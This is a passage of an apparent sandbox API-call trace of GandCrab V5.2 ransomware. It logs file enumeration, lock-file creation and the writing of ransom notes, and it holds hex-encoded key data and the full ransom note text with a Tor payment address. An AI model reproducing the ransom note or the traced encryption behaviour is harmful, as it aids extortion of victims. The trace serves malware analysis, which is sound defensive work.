x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0091.225] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0091.226] CloseHandle (hObject=0x2ac) returned 1 [0091.226] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.226] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.226] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x24, wMilliseconds=0x218)) [0091.226] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.226] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.227] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.227] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\d2ca4a09d2ca4deb61a.lock") returned 66 [0091.227] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my videos\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0091.227] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.227] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\") returned 42 [0091.228] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\*" [0091.228] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0xffffffff [0091.228] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\*", lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0xffffffff [0091.228] CloseHandle (hObject=0x2ac) returned 1 [0091.228] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.228] lstrcmpW (lpString1="OneNote Notebooks", lpString2=".") returned 1 [0091.228] lstrcmpW (lpString1="OneNote Notebooks", lpString2="..") returned 1 [0091.228] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="OneNote Notebooks" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks" [0091.228] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\" [0091.228] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0091.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.228] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.229] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.229] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.229] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.229] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.229] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.229] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\\\TITWMVJL-DECRYPT.txt") returned 71 [0091.229] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0091.230] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x